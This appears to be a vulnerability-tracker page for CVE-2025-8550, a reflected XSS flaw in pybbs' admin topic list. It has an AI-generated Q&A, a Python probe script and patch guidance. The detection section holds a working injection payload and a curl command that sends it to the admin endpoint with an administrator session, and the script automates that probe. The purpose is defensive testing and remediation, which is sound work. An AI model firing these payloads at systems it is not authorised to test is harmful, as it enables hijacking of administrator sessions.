CVE-2025-8550
BaseFortify
Publication date: 2025-08-05
Last updated on: 2026-04-29
Assigner: VulDB
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pybbs_project | pybbs | up to and including 6.0.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-8550 is a reflected cross-site scripting (XSS) vulnerability in the atjiu pybbs forum application, affecting releases up to and including 6.0.0. The /admin/topic/list endpoint echoes user-controllable request parameters, in particular the username argument, into its HTML response without encoding or sanitizing them, so a crafted value closes the surrounding attribute and injects a tag of the attacker's choosing. An attacker who gets an administrator to open such a link has arbitrary JavaScript executed in that administrator's browser, in the origin of the pybbs instance. The payload only renders for a user who can reach the admin endpoint, so exploitation requires a logged-in administrator and that administrator's interaction (opening the link); a proof-of-concept is publicly available. [1, 2, 3]
How can this vulnerability impact me?
Script running in an administrator's browser can read everything that page can read and send requests that carry the administrator's session. That enables session hijacking, actions performed with administrator privileges through forged requests, and ultimately control over the forum and its data. Because the reflection sits in the admin area rather than in a public page, a single successful lure compromises the whole application, not one user's view of it. The attack is remote but depends on an authenticated administrator opening the crafted link. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Test the /admin/topic/list endpoint for reflected XSS by sending a distinctive HTML payload in the username parameter and checking whether it comes back in the response body unencoded. A payload such as `1"><img src=1 onerror=alert(9)>` first closes the attribute the value is written into and then opens an `<img>` tag whose error handler runs. A sample curl command is: `curl -i -G --data-urlencode "username=1\"><img src=1 onerror=alert(9)>" https://your-pybbs-instance/admin/topic/list`. Two caveats make the difference between a real result and a false negative: the request must carry a valid administrator session, otherwise the server redirects to the login page and nothing is reflected; and curl does not execute JavaScript, so the evidence is the literal string `<img src=1 onerror=alert(9)>` in the response body rather than an alert. If the tag appears as `&lt;img ... &gt;` the output is encoded and not exploitable; if it is missing entirely the parameter is either not reflected or a sanitizer stripped it. A web vulnerability scanner that covers reflected XSS can automate the same check, and reviewing web server access logs for requests to /admin/topic/list whose username value contains angle brackets or `on...=` event handlers shows whether anyone has already tried it. [2]
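The check described above, as an added example that is not part of the original page or of pybbs itself: it builds the same GET request the curl command sends, submits it with an administrator session cookie, and classifies the response as raw reflection (vulnerable), entity-encoded reflection (safe), or no reflection (parameter not echoed or payload stripped). The base URL and the cookie header are assumptions supplied on the command line; the sample response bodies used for offline testing are constructed here, not captured from a real instance.

```python
"""Probe for CVE-2025-8550 (reflected XSS in pybbs /admin/topic/list).

Added example, not pybbs code. Assumptions: the operator supplies the
instance base URL and a Cookie header holding a valid administrator
session (pybbs's cookie name is not stated in the advisory).
"""
import html
import sys
import urllib.error
import urllib.parse
import urllib.request

# The tag the advisory's PoC injects. It is harmless on its own and unlikely
# to occur in a legitimate page, so its presence in the body is decisive.
TAG = '<img src=1 onerror=alert(9)>'
# The leading `1">` closes the attribute the value is written into.
PAYLOAD = '1">' + TAG


def build_probe_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Reproduce `curl -G --data-urlencode "username=..."` as a GET URL."""
    query = urllib.parse.urlencode({"username": payload})
    return base_url.rstrip("/") + "/admin/topic/list?" + query


def classify_reflection(body: str) -> str:
    """'raw' = tag reflected verbatim (vulnerable), 'encoded' = reflected
    with < and > escaped (not exploitable), 'absent' = not reflected or
    stripped by a sanitizer."""
    if TAG in body:
        return "raw"
    encoded_variants = (
        html.escape(TAG, quote=False),                      # &lt; ... &gt;
        TAG.replace("<", "&#60;").replace(">", "&#62;"),    # decimal refs
        TAG.replace("<", "&#x3c;").replace(">", "&#x3e;"),  # hex refs
    )
    if any(variant in body for variant in encoded_variants):
        return "encoded"
    return "absent"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx as HTTPError instead of silently following it to login."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url: str, cookie_header: str, timeout: float = 10.0):
    """Send the probe; return (http_status, verdict)."""
    req = urllib.request.Request(
        build_probe_url(base_url),
        headers={"Cookie": cookie_header, "User-Agent": "cve-2025-8550-probe"},
    )
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
            return resp.status, classify_reflection(body)
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            # Bounced to the login page: the session cookie is missing/expired,
            # so the result says nothing about the vulnerability.
            return err.code, "unauthenticated"
        body = err.read().decode("utf-8", errors="replace")
        return err.code, classify_reflection(body)


# Constructed sample bodies (not captured from pybbs) showing the three verdicts.
SAMPLE_BODIES = {
    "vulnerable": '<input name="username" value="1"><img src=1 onerror=alert(9)>">',
    "encoded":    '<input name="username" value="1&quot;&gt;&lt;img src=1 onerror=alert(9)&gt;">',
    "stripped":   '<input name="username" value="1&quot;&gt;">',
}


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: probe.py https://your-pybbs-instance 'COOKIE=value'")
    status, verdict = probe(sys.argv[1], sys.argv[2])
    print(f"HTTP {status}: {verdict}")
```

Run it before and after patching: a vulnerable instance returns `raw`; one that encodes output returns `encoded`; one running the Jsoup whitelist filter returns `absent`, because `img` is not in the basic whitelist and the whole tag is removed before the value reaches the template. An `unauthenticated` verdict means the cookie is wrong, not that the instance is safe.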
What immediate steps should I take to mitigate this vulnerability?
The fix is the upstream commit 2fe4a51afbce0068c291bc1818bbc8f7f3b01a22, which replaces the scattered inline sanitization with a centralized XSS filter and aspect that run every incoming HTTP request parameter and JSON payload through Jsoup's Whitelist.basic() policy. That policy keeps a small set of text-formatting tags and drops everything else, including `<img>` and every event-handler attribute, so the advisory's payload never reaches the template. Apply the patched release and then re-run the reflection probe against /admin/topic/list to confirm the tag is no longer echoed. Input whitelisting at the filter is a coarse control; contextual output encoding in the templates remains the primary XSS defence and should not be considered replaced by it. Until the patch is deployed, limit who can reach the /admin/ path (network or VPN restriction), add a WAF rule that rejects requests whose username parameter contains `<`, `>` or `on...=` event handlers, and warn administrators not to open links to the admin area that arrive from outside, since the exploit depends on a logged-in administrator following such a link. [3, 4]